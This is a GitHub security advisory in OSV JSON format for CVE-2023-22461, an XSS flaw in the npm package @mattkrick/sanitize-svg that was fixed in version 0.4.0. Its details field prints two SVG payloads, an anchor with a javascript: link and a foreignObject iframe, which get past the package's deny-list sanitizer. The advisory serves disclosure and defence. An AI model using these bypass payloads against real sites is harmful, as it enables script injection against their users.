{
  "schema_version": "1.4.0",
  "id": "GHSA-h857-2g56-468g",
  "modified": "2023-01-05T12:18:35Z",
  "published": "2023-01-05T12:18:35Z",
  "aliases": [
    "CVE-2023-22461"
  ],
  "summary": "@mattkrick/sanitize-svg vulnerable to Cross-Site Scripting (XSS)",
  "details": "### Impact\nThe *sanitize-svg* package uses a deny-list-pattern to sanitize SVGs to prevent cross-site scripting (XSS). In doing so, literal `<script>`-tags and on-event handlers were detected:\n```typescript\n[...]\n  const svgEl = div.firstElementChild!\n  const attributes = Array.from(svgEl.attributes).map(({ name }) => name)\n  const hasScriptAttr = !!attributes.find((attr) => attr.startsWith('on'))\n  const scripts = svgEl.getElementsByTagName('script')\n  return scripts.length === 0 && !hasScriptAttr ? svg : null\n[...]\n```\n\nThere are more ways to embed JavaScript in XML files.\n\n**Anchor Tag** (requires user to click link):\n```xml\n<svg viewBox=\"0 0 100 100\" xmlns=\"http://www.w3.org/2000/svg\">\n  <a href=\"javascript:alert(document.domain)\">\n    <text x=\"50\" y=\"50\" text-anchor=\"middle\">Lauritz</text>\n  </a>\n</svg>\n```\n\n**Foreign Object Tag** (no user interaction required):\n```xml\n<svg width=\"500\" height=\"500\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\">\n        <text x=\"20\" y=\"35\">Lauritz</text>\n        <foreignObject width=\"500\" height=\"500\">\n                <iframe xmlns=\"http://www.w3.org/1999/xhtml\" src=\"javascript:confirm(document.domain);\" width=\"400\" height=\"250\"/>\n        </foreignObject>\n</svg>\n```\n\nAs a result, downstream software that relies on `sanitize-svg` and expects resulting SVGs to be safe, may be vulnerable to XSS. We are aware of at least one downstream project for which this vulnerability had security implications. \n\n### Patches\nThis vulnerability was addressed in v0.4.0.\n\n### Workarounds\nN/A",
  "severity": [
    {
      "type": "CVSS_V3",
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"
    }
  ],
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@mattkrick/sanitize-svg"
      },
      "ranges": [
        {
          "type": "ECOSYSTEM",
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.4.0"
            }
          ]
        }
      ],
      "database_specific": {
        "last_known_affected_version_range": "<= 0.3.1"
      }
    }
  ],
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mattkrick/sanitize-svg/security/advisories/GHSA-h857-2g56-468g"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-22461"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mattkrick/sanitize-svg/commit/b107e453ede7b58adcccae74a3e474c012eec85d"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mattkrick/sanitize-svg"
    }
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2023-01-05T12:18:35Z",
    "nvd_published_at": "2023-01-04T15:15:00Z"
  }
}